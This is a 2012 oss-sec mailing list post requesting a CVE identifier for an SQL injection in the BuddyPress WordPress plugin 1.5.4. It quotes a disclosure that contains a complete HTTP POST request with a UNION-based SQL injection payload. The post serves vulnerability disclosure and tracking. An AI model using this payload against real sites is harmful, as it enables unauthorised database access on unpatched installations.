oss-sec mailing list archives

CVE-request: WordPress BuddyPress-plugin SQL-injection 1.5.4

From: Henri Salo <henri () nerv fi>
Date: Sun, 15 Apr 2012 12:05:37 +0300

Hello,

Can I get 2012 CVE-identifier for WordPress BuddyPress-plugin SQL-injection.

Affected: 1.5.4
Fixed: 1.5.5
Vendor: http://buddypress.org/2012/03/buddypress-1-5-5/
OSVDB: http://osvdb.org/show/osvdb/80763
Changelog: http://codex.buddypress.org/releases/version-1-5/ (doesn't seem to say about this issue)

http://seclists.org/bugtraq/2012/Apr/4
"""
Hi,

I would like disclosure SQL injection vulnerability if Buddypress plugin affecting last versions. This issue was 
reported to developers and resolved in 1.5.5 version. So, I suggest all having this plugin in their blogs update to 
last version, if you haven't done it yet. Example of POST message with sql injection is below.

POST /wp-load.php HTTP/1.1
User-Agent: Mozilla
Host: example.com
Accept: */*
Referer: http://example.com/activity/?s=b
Connection: Keep-Alive
Content-Length: 153
Content-Type: application/x-www-form-urlencoded

action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+
"""

- Henri Salo

Current thread:

CVE-request: WordPress BuddyPress-plugin SQL-injection 1.5.4 Henri Salo (Apr 15)
- Re: CVE-request: WordPress BuddyPress-plugin SQL-injection 1.5.4 Kurt Seifried (Apr 16)